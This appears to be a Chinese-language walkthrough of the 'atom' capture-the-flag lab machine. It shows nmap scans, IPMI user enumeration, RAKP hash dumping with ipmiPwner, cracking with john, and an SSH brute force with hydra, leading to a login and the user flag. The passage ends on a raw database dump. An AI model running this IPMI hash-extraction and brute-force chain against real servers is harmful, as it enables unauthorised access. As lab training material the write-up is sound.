3 packets received by filter, 0 packets dropped by kernel Ending arp-scan 1.10.0: 256 hosts scanned in 1.881 seconds (136.10 hosts/sec). 3 responded ┌──(kali㉿kali)-[~] └─$ sudo nmap -sS -sV -A -p- 192.168.56.115 ##我还加了全端口参数,尼玛,人傻了 Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-09-06 08:34 EDT Nmap scan report for 192.168.56.115 Host is up (0.00091s latency). Not shown: 65534 closed tcp ports (reset) PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 9.2p1 Debian 2+deb12u2 (protocol 2.0) | ssh-hostkey: | 256 e7:ce:f2:f6:5d:a7:47:5a:16:2f:90:07:07:33:4e:a9 (ECDSA) |_ 256 09:db:b7:e8:ee:d4:52:b8:49:c3:cc:29:a5:6e:07:35 (ED25519) MAC Address: 08:00:27:DD:D0:AD (Oracle VirtualBox virtual NIC) Device type: general purpose Running: Linux 4.X|5.X OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5 OS details: Linux 4.15 - 5.8 Network Distance: 1 hop Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE HOP RTT ADDRESS 1 0.91 ms 192.168.56.115
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 9.26 seconds
没办法看了下wp(看wp是个学习的过程),nmap默认只扫tcp连接,
1 2 3 4 5 6 7 8 9 10 11 12 13
┌──(kali㉿kali)-[~] └─$ sudo nmap -sU -sV --version-intensity 0 -n -F -T4 192.168.56.115 Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-09-06 08:42 EDT Warning: 192.168.56.115 giving up on port because retransmission cap hit (6). Nmap scan report for 192.168.56.115 Host is up (0.00060s latency). Not shown: 56 closed udp ports (port-unreach), 43 open|filtered udp ports (no-response) PORT STATE SERVICE VERSION 623/udp open asf-rmcp MAC Address: 08:00:27:DD:D0:AD (Oracle VirtualBox virtual NIC)
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 62.74 seconds
Name Current Setting Required Description ---- --------------- -------- ----------- BATCHSIZE 256 yes The number of hosts to probe in each set RHOSTS yes The target host(s), see https://docs.metasploit.com/docs/u sing-metasploit/basics/using-metasploit.html RPORT 623 yes The target port (UDP) THREADS 10 yes The number of concurrent threads
View the full module info with the info, or info -d command.
Name Current Setting Required Description ---- --------------- -------- ----------- BATCHSIZE 256 yes The number of hosts to probe in each set RHOSTS yes The target host(s), see https://docs.metasploit.com/docs/u sing-metasploit/basics/using-metasploit.html RPORT 623 yes The target port (UDP) THREADS 10 yes The number of concurrent threads
View the full module info with the info, or info -d command.
Name Current Setting Required Description ---- --------------- -------- ----------- CRACK_COMMON trueyes Automatically crack common passwords as they are obtained OUTPUT_HASHCAT_FILE no Save captured password hashes in hashca t format OUTPUT_JOHN_FILE no Save captured password hashes in john t he ripper format PASS_FILE /usr/share/metasploit-f yes File containing common passwords for of ramework/data/wordlists fline cracking, one per line /ipmi_passwords.txt RHOSTS yes The target host(s), see https://docs.me tasploit.com/docs/using-metasploit/basi cs/using-metasploit.html RPORT 623 yes The target port SESSION_MAX_ATTEMPTS 5 yes Maximum number of session retries, requ ired on certain BMCs (HP iLO 4, etc) SESSION_RETRY_DELAY 5 yes Delay between session retries in second s THREADS 1 yes The number of concurrent threads (max o ne per host) USER_FILE /usr/share/metasploit-f yes File containing usernames, one per line ramework/data/wordlists /ipmi_users.txt
View the full module info with the info, or info -d command.
┌──(kali㉿kali)-[~/atom/ipmiPwner] └─$ ipmitool -I lanplus -C 0 -H 192.168.56.115 -U admin -P cukorborso user list|awk -F '[ ]''{print $3}'|uniq -u >user ##uniq -u是去除重复项的作用 ┌──(kali㉿kali)-[~/atom/ipmiPwner] └─$ cat user Name ##手动把这个删掉,剩下的就全是用户名了 glynn asia zaylen fabien merola jem riyaz laten cati rozalia palmer onida terra ranga harrie pauly els bqb karlotte zali ende stacey shirin kaki saman kalie deshawn mayeul
我们用glynn这个用户试试水,看看脚本能不能用
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18
┌──(kali㉿kali)-[~/atom/ipmiPwner] └─$ sudo python3 ipmipwner.py --host 192.168.56.115 -u glynn -c john -pW /usr/share/wordlists/rockyou.txt -oH hash [*] Checking if port 623 for host 192.168.56.115 is active [*] The username: glynn is valid [*] Saving hashfor user: glynn in file: "hash" [*] The hashfor user: glynn \_ $rakp$a4a3a2a0820c00003e6590e5a4eafbafffd2cb46e796bafcf7bb91a2d4efbf5bb6d97179e60f1e57a123456789abcdefa123456789abcdef1405676c796e6e$82cf7025b77994028f0357833efc33cd1ea8d32d [*] Starting the hash cracking with john
Created directory: /root/.john Using default input encoding: UTF-8 Loaded 1 password hash (RAKP, IPMI 2.0 RAKP (RMCP+) [HMAC-SHA1 128/128 AVX 4x]) Will run 8 OpenMP threads Press Ctrl-C to abort, or send SIGUSR1 to john process for status evan (192.168.56.115 glynn) —##evan就是glynn的密码 1g 0:00:00:00 DONE (2024-09-06 10:21) 50.00g/s 6553Kp/s 6553Kc/s 6553KC/s 123456..kovacs Use the "--show" option to display all of the cracked passwords reliably Session completed.
根据项目文档说明,-c john就是获取到hash再通过john碰撞rockyou字典得到密码
那用user文本批量碰撞hash,呃呃,好像不能直接把user丢进去让他自动碰撞
那就写个循环
1 2
┌──(kali㉿kali)-[~/atom/ipmiPwner] └─$ for i in $(cat user);dosudo python3 ipmipwner.py --host 192.168.56.115 -u $i -c john -pW /usr/share/wordlists/rockyou.txt -oH hash>>pass;done## 使用for循环遍历user文本中的字符串,-u参数后加变量$i ,可以是可以就是有一点点慢,多等一会就好了
┌──(kali㉿kali)-[~/atom/ipmiPwner] └─$ hydra -L user -P password 192.168.56.115 ssh Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2024-09-06 11:15:56 [WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4 [DATA] max 16 tasks per 1 server, overall 16 tasks, 784 login tries (l:28/p:28), ~49 tries per task [DATA] attacking ssh://192.168.56.115:22/ [STATUS] 318.00 tries/min, 318 tries in 00:01h, 467 to doin 00:02h, 15 active [22][ssh] host: 192.168.56.115 login: onida password: jiggaman ##还真找到一下,直接登上看一下 [STATUS] 301.50 tries/min, 603 tries in 00:02h, 183 to doin 00:01h, 14 active 1 of 1 target successfully completed, 1 valid password found Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2024-09-06 11:18:41
登入onida用户
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18
┌──(kali㉿kali)-[~/atom/ipmiPwner] └─$ ssh [email protected] [email protected]'s password: Linux atom 6.1.0-21-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.90-1 (2024-05-03) x86_64 The programs included with the Debian GNU/Linux system are free software; the exact distribution terms for each program are described in the individual files in /usr/share/doc/*/copyright. Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent permitted by applicable law. onida@atom:~$ sudo -l -bash: sudo: command not found onida@atom:~$ ls user.txt onida@atom:~$ cat user.txt f75390001fa2fe806b4e3f1e5dadeb2b onida@atom:~$
onida@atom:/var/www/html$ cat atom-2400-database.db Q�Y�&��mtableusersusersCREATE TABLE users ( id INTEGER PRIMARY KEY, username TEXT UNIQUE NOT NULL, password TEXT NOT NULL ))=indexsqlite_autoindex_users_1user�$))�tablelogin_attemptslogin_attemptsCREATE TABLE login_attempts ( id INTEGER PRIMARY KEY, ip_address TEXT NOT NULL, attempt_time INTEGER NOT NULL ��nKE�atom$2y$10$Z1K.4yVakZEY.Qsju3WZzukW/M3fI6BkSohYOiBQqG7pK1F2fH9Cm ��� atom